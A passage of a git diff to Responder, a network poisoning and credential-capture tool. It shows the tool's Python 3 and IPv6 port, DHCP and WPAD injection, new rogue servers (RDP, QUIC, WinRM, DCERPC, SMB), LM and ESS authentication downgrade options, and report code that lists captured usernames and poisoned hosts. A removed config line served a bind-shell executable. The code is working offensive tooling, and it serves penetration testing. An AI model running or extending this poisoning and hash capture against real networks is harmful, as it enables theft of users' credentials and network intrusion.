file + retrieval. This may cause a login prompt. Default: + False + -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) + authentication for the proxy. WPAD doesn't need to be + ON. This option is highly effective. Default: False + -Q, --quiet Tell Responder to be quiet, disables a bunch of + printing from the poisoners. Default: False + --lm Force LM hashing downgrade for Windows XP/2003 and + earlier. Default: False + --disable-ess Force ESS downgrade. Default: False + -v, --verbose Increase verbosity. + -t 1e, --ttl=1e Change the default Windows TTL for poisoned answers. + Value in hex (30 seconds = 1e). use '-t random' for + random TTL + -N ANSWERNAME, --AnswerName=ANSWERNAME + Specifies the canonical name returned by the LLMNR + poisoner in tits Answer section. By default, the + answer's canonical name is the same as the query. + Changing this value is mainly useful when attempting + to perform Kebreros relaying over HTTP. + -E, --ErrorCode Changes the error code returned by the SMB server to + STATUS_LOGON_FAILURE. By default, the status is + STATUS_ACCESS_DENIED. Changing this value permits to + obtain WebDAV authentications from the poisoned + machines where the WebClient service is running. + ## Donation ## -You can contribute to this project by donating to the following BTC address: +You can contribute to this project by donating to the following $XLM (Stellar Lumens) address: -1Pv9rZMNfy9hsW19eQhNGs22gY9sf6twjW +"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH" -Or via Paypal: +Paypal: + +https://paypal.me/PythonResponder + + +## Acknowledgments ## + +Late Responder development has been possible because of the donations received from individuals and companies. + +We would like to thanks those major sponsors: + +- SecureWorks: https://www.secureworks.com/ + +- Synacktiv: https://www.synacktiv.com/ + +- Black Hills Information Security: http://www.blackhillsinfosec.com/ + +- TrustedSec: https://www.trustedsec.com/ + +- Red Siege Information Security: https://www.redsiege.com/ + +- Open-Sec: http://www.open-sec.com/ + +- And all, ALL the pentesters around the world who donated to this project. + +Thank you. -[![donate](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=F7UDPDKM65Q7A) ## Copyright ## diff --git a/Report.py b/Report.py index a312a87..ff09e16 100755 --- a/Report.py +++ b/Report.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com @@ -31,6 +31,10 @@ def DbConnect(): cursor = sqlite3.connect("./Responder.db") return cursor +def FingerDbConnect(): + cursor = sqlite3.connect("./tools/RunFinger.db") + return cursor + def GetResponderData(cursor): res = cursor.execute("SELECT * FROM Responder") for row in res.fetchall(): @@ -39,7 +43,7 @@ def GetResponderData(cursor): def GetResponderUsernamesStatistic(cursor): res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder") for row in res.fetchall(): - print color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1) + print(color('\n[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)) def GetResponderUsernames(cursor): res = cursor.execute("SELECT DISTINCT user FROM Responder") @@ -57,16 +61,33 @@ def GetResponderCompleteHash(cursor): for row in res.fetchall(): print('{0}'.format(row[0])) +def GetUniqueLookupsIP(cursor): + res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)") + for row in res.fetchall(): + if 'fe80::' in row[1]: + pass + else: + print('Protocol: {0}, IP: {1}'.format(row[0], row[1])) + def GetUniqueLookups(cursor): res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner") for row in res.fetchall(): print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3])) +def GetUniqueDHCP(cursor): + res = cursor.execute("SELECT * FROM DHCP WHERE MAC in (SELECT DISTINCT UPPER(MAC) FROM DHCP)") + for row in res.fetchall(): + print('MAC: {0}, IP: {1}, RequestedIP: {2}'.format(row[1], row[2], row[3])) + +def GetRunFinger(cursor): + res = cursor.execute("SELECT * FROM RunFinger WHERE Host in (SELECT DISTINCT Host FROM RunFinger)") + for row in res.fetchall(): + print(("{},['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11]))) def GetStatisticUniqueLookups(cursor): res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)") for row in res.fetchall(): - print color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1) + print(color('\n[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)) def SavePoisonersToDb(result): @@ -82,14 +103,25 @@ def SaveToDb(result): result[k] = '' cursor = DbConnect() -print color("[+] Generating report...", code = 3, modifier = 1) -print color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1) +print(color("[+] Generating report...\n", code = 3, modifier = 1)) + +print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1)) +GetUniqueDHCP(cursor) +print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1)) +GetUniqueLookupsIP(cursor) +print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1)) GetUniqueLookups(cursor) GetStatisticUniqueLookups(cursor) -print color("\n[+] Extracting captured usernames:", code = 2, modifier = 1) +print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)) GetResponderUsernames(cursor) -print color("\n[+] Username details:", code = 2, modifier = 1) +print(color("\n[+] Username details:", code = 2, modifier = 1)) GetResponderUsernamesWithDetails(cursor) GetResponderUsernamesStatistic(cursor) -#print color("\n[+] Captured hashes:", code = 2, modifier = 1) -#GetResponderCompleteHash(cursor) +print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1)) +cursor.close() +try: + cursor = FingerDbConnect() + GetRunFinger(cursor) +except: + pass +print('\n') diff --git a/Responder.conf b/Responder.conf old mode 100644 new mode 100755 index b34d9a1..5a4e46a --- a/Responder.conf +++ b/Responder.conf @@ -1,19 +1,30 @@ [Responder Core] -; Servers to start -SQL = On -SMB = On -Kerberos = On -FTP = On -POP = On -SMTP = On -IMAP = On -HTTP = On -HTTPS = On -DNS = On -LDAP = On +; Poisoners to start +MDNS = On +LLMNR = On +NBTNS = On -; Custom challenge. +; Servers to start +SQL = On +SMB = On +QUIC = On +RDP = On +Kerberos = On +FTP = On +POP = On +SMTP = On +IMAP = On +HTTP = On +HTTPS = On +DNS = On +LDAP = On +DCERPC = On +WINRM = On +SNMP = On +MQTT = On + +; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = Random @@ -34,21 +45,27 @@ AnalyzeLog = Analyzer-Session.log ResponderConfigDump = Config-Responder.log ; Specific IP Addresses to respond to (default = All) -; Example: RespondTo = 10.20.1.100-150, 10.20.3.10 +; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334 RespondTo = ; Specific NBT-NS/LLMNR names to respond to (default = All) ; Example: RespondTo = WPAD, DEV, PROD, SQLINT +;RespondToName = WPAD, DEV, PROD, SQLINT RespondToName = ; Specific IP Addresses not to respond to (default = None) -; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10 -DontRespondTo = +; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding. +; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334 +DontRespondTo = ; Specific NBT-NS/LLMNR names not to respond to (default = None) -; Example: DontRespondTo = NAC, IPS, IDS +; Example: DontRespondToName = NAC, IPS, IDS DontRespondToName = ISATAP +; MDNS TLD not to respond to (default = _dosvc). Do not add the ".", only the TLD. +; Example: DontRespondToTLD = _dosvc, _blasvc, etc +DontRespondToTLD = _dosvc + ; If set to On, we will stop answering further requests from a host ; if a hash has been previously captured for this host. AutoIgnoreAfterSuccess = Off @@ -58,8 +75,8 @@ AutoIgnoreAfterSuccess = Off ; This may break file serving and is useful only for hash capture CaptureMultipleCredentials = On -; If set to On, we will write to file all hashes captured from the same host. -; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, +; If set to On, we will write to file all hashes captured from the same host. +; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, ; domain\popo, domain\zozo. Recommended value: On, capture everything. CaptureMultipleHashFromSameHost = On @@ -79,18 +96,18 @@ Serve-Html = Off HtmlFilename = files/AccessDenied.html ; Custom EXE File to serve -ExeFilename = files/BindShell.exe +ExeFilename = ;files/filetoserve.exe ; Name of the downloaded .exe that the client will see ExeDownloadName = ProxyClient.exe ; Custom WPAD Script -WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';} +; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address. +WPADScript = ; HTML answer to inject in HTTP responses (before tag). -; Set to an empty string to disable. -; In this example, we redirect make users' browsers issue a request to our rogue SMB server. -HTMLToInject = Loading +; leave empty if you want to use the default one (redirect to SMB on your IP address). +HTMLToInject = [HTTPS Server] diff --git a/Responder.py b/Responder.py index 9af8d86..952b086 100755 --- a/Responder.py +++ b/Responder.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com @@ -14,43 +14,54 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . +import asyncio import optparse import ssl - -from SocketServer import TCPServer, UDPServer, ThreadingMixIn +try: + from SocketServer import TCPServer, UDPServer, ThreadingMixIn +except: + from socketserver import TCPServer, UDPServer, ThreadingMixIn from threading import Thread from utils import * import struct banner() -parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0]) +parser = optparse.OptionParser(usage='python %prog -I eth0 -w -d\nor:\npython %prog -I eth0 -wd', version=settings.__version__, prog=sys.argv[0]) parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False) parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None) parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) - +parser.add_option('-6', "--externalip6", action="store", help="Poison all requests with another IPv6 address than Responder's one.", dest="ExternalIP6", metavar="2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed", default=None) parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None) - parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False) -parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False) -parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False) -parser.add_option('-f','--fingerprint', action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False) +parser.add_option('-d', '--DHCP', action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False) +parser.add_option('-D', '--DHCP-DNS', action="store_true", help="This option will inject a DNS server in the DHCP response, otherwise a WPAD server will be added. Default: False", dest="DHCP_DNS", default=False) + parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False) parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None) parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False) -parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False) +parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective. Default: False", dest="ProxyAuth_On_Off", default=False) +parser.add_option('-Q','--quiet', action="store_true", help="Tell Responder to be quiet, disables a bunch of printing from the poisoners. Default: False", dest="Quiet", default=False) parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) +parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") +parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None) +parser.add_option('-N', '--AnswerName', action="store", help="Specifies the canonical name returned by the LLMNR poisoner in tits Answer section. By default, the answer's canonical name is the same as the query. Changing this value is mainly useful when attempting to perform Kebreros relaying over HTTP.", dest="AnswerName", default=None) +parser.add_option('-E', '--ErrorCode', action="store_true", help="Changes the error code returned by the SMB server to STATUS_LOGON_FAILURE. By default, the status is STATUS_ACCESS_DENIED. Changing this value permits to obtain WebDAV authentications from the poisoned machines where the WebClient service is running.", dest="ErrorCode", default=False) options, args = parser.parse_args() if not os.geteuid() == 0: - print color("[!] Responder must be run as root.") + print(color("[!] Responder must be run as root.")) sys.exit(-1) -elif options.OURIP is None and IsOsX() is True: - print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n" +elif options.OURIP == None and IsOsX() == True: + print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n") parser.print_help() exit(-1) + +elif options.ProxyAuth_On_Off and options.WPAD_On_Off: + print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n") + exit(-1) settings.init() settings.Config.populate(options) @@ -59,20 +70,26 @@ StartupMessage() settings.Config.ExpandIPRanges() -if settings.Config.AnalyzeMode: - print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1) - #Create the DB, before we start Responder. CreateResponderDb() +Have_IPv6 = settings.Config.IPv6 + class ThreadingUDPServer(ThreadingMixIn, UDPServer): def server_bind(self): if OsInterfaceIsSupported(): try: - if settings.Config.Bind_To_ALL: - pass - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if settings.Config.Bind_To_ALL: + pass + else: + if (sys.version_info > (3, 0)): + self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) + else: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) except: pass UDPServer.server_bind(self) @@ -81,10 +98,17 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): if OsInterfaceIsSupported(): try: - if settings.Config.Bind_To_ALL: - pass - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if settings.Config.Bind_To_ALL: + pass + else: + if (sys.version_info > (3, 0)): + self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) + else: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) except: pass TCPServer.server_bind(self) @@ -93,215 +117,317 @@ class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer): def server_bind(self): if OsInterfaceIsSupported(): try: - if settings.Config.Bind_To_ALL: - pass - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if settings.Config.Bind_To_ALL: + pass + else: + if (sys.version_info > (3, 0)): + self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) + else: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) except: pass - self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) TCPServer.server_bind(self) class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): def server_bind(self): MADDR = "224.0.0.251" - + MADDR6 = 'ff02::fb' self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1) self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton) + #IPV6: + if (sys.version_info > (3, 0)): + if Have_IPv6: + mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) + else: + if Have_IPv6: + mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) if OsInterfaceIsSupported(): try: - if settings.Config.Bind_To_ALL: - pass - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if settings.Config.Bind_To_ALL: + pass + else: + if (sys.version_info > (3, 0)): + self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) + else: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) except: pass UDPServer.server_bind(self) class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): def server_bind(self): - MADDR = "224.0.0.252" + MADDR = '224.0.0.252' + MADDR6 = 'FF02:0:0:0:0:0:1:3' self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) - self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - + self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton) - + + #IPV6: + if Have_IPv6: + mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) if OsInterfaceIsSupported(): try: - if settings.Config.Bind_To_ALL: - pass - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if settings.Config.Bind_To_ALL: + pass + else: + if (sys.version_info > (3, 0)): + self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) + else: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') + if Have_IPv6: + self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) except: pass UDPServer.server_bind(self) + ThreadingUDPServer.allow_reuse_address = 1 +if Have_IPv6: + ThreadingUDPServer.address_family = socket.AF_INET6 + ThreadingTCPServer.allow_reuse_address = 1 +if Have_IPv6: + ThreadingTCPServer.address_family = socket.AF_INET6 + ThreadingUDPMDNSServer.allow_reuse_address = 1 +if Have_IPv6: + ThreadingUDPMDNSServer.address_family = socket.AF_INET6 + ThreadingUDPLLMNRServer.allow_reuse_address = 1 +if Have_IPv6: + ThreadingUDPLLMNRServer.address_family = socket.AF_INET6 + ThreadingTCPServerAuth.allow_reuse_address = 1 +if Have_IPv6: + ThreadingTCPServerAuth.address_family = socket.AF_INET6 def serve_thread_udp_broadcast(host, port, handler): try: - server = ThreadingUDPServer((host, port), handler) + server = ThreadingUDPServer(('', port), handler) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") def serve_NBTNS_poisoner(host, port, handler): - serve_thread_udp_broadcast(host, port, handler) + serve_thread_udp_broadcast('', port, handler) def serve_MDNS_poisoner(host, port, handler): try: - server = ThreadingUDPMDNSServer((host, port), handler) + server = ThreadingUDPMDNSServer(('', port), handler) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") def serve_LLMNR_poisoner(host, port, handler): try: - server = ThreadingUDPLLMNRServer((host, port), handler) + server = ThreadingUDPLLMNRServer(('', port), handler) server.serve_forever() except: - raise - print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running." - + print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") + def serve_thread_udp(host, port, handler): try: if OsInterfaceIsSupported(): - server = ThreadingUDPServer((host, port), handler) + server = ThreadingUDPServer(('', port), handler) server.serve_forever() else: - server = ThreadingUDPServer((host, port), handler) + server = ThreadingUDPServer(('', port), handler) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") def serve_thread_tcp(host, port, handler): try: if OsInterfaceIsSupported(): - server = ThreadingTCPServer((host, port), handler) + server = ThreadingTCPServer(('', port), handler) server.serve_forever() else: - server = ThreadingTCPServer((host, port), handler) + server = ThreadingTCPServer(('', port), handler) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.") def serve_thread_tcp_auth(host, port, handler): try: if OsInterfaceIsSupported(): - server = ThreadingTCPServerAuth((host, port), handler) + server = ThreadingTCPServerAuth(('', port), handler) server.serve_forever() else: - server = ThreadingTCPServerAuth((host, port), handler) + server = ThreadingTCPServerAuth(('', port), handler) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.") def serve_thread_SSL(host, port, handler): try: cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) - + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + context.load_cert_chain(cert, key) if OsInterfaceIsSupported(): - server = ThreadingTCPServer((host, port), handler) - server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True) + server = ThreadingTCPServer(('', port), handler) + server.socket = context.wrap_socket(server.socket, server_side=True) server.serve_forever() else: - server = ThreadingTCPServer((host, port), handler) - server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True) + server = ThreadingTCPServer(('', port), handler) + server.socket = context.wrap_socket(server.socket, server_side=True) server.serve_forever() except: - print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running." + print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.") + def main(): try: + if (sys.version_info < (3, 0)): + print(color('\n\n[-]', 3, 1) + " Still using python 2? :(") + print(color('\n[+]', 2, 1) + " Listening for events...\n") + threads = [] # Load (M)DNS, NBNS and LLMNR Poisoners - from poisoners.LLMNR import LLMNR - from poisoners.NBTNS import NBTNS - from poisoners.MDNS import MDNS - threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,))) - threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,))) - threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,))) + if settings.Config.LLMNR_On_Off: + from poisoners.LLMNR import LLMNR + threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,))) + if settings.Config.NBTNS_On_Off: + from poisoners.NBTNS import NBTNS + threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,))) + + if settings.Config.MDNS_On_Off: + from poisoners.MDNS import MDNS + threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,))) + + #// Vintage Responder BOWSER module, now disabled by default. + #// Generate to much noise & easily detectable on the network when in analyze mode. # Load Browser Listener - from servers.Browser import Browser - threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,))) + #from servers.Browser import Browser + #threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,))) if settings.Config.HTTP_On_Off: from servers.HTTP import HTTP - threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,))) + + if settings.Config.WinRM_On_Off: + from servers.WinRM import WinRM + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,))) + + if settings.Config.WinRM_On_Off: + from servers.WinRM import WinRM + threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,))) if settings.Config.SSL_On_Off: from servers.HTTP import HTTP - threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTP,))) + threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,))) + + if settings.Config.RDP_On_Off: + from servers.RDP import RDP + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,))) + + if settings.Config.DCERPC_On_Off: + from servers.RPC import RPCMap, RPCMapper + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,))) if settings.Config.WPAD_On_Off: from servers.HTTP_Proxy import HTTP_Proxy - threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,))) if settings.Config.ProxyAuth_On_Off: from servers.Proxy_Auth import Proxy_Auth - threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,))) + threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,))) if settings.Config.SMB_On_Off: if settings.Config.LM_On_Off: from servers.SMB import SMB1LM - threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,))) else: from servers.SMB import SMB1 - threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,))) + + if settings.Config.QUIC_On_Off: + from servers.QUIC import start_quic_server + cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) + key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) + threads.append(Thread(target=lambda: asyncio.run(start_quic_server(settings.Config.Bind_To, cert, key)))) if settings.Config.Krb_On_Off: from servers.Kerberos import KerbTCP, KerbUDP threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,))) if settings.Config.SQL_On_Off: - from servers.MSSQL import MSSQL - threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,))) + from servers.MSSQL import MSSQL, 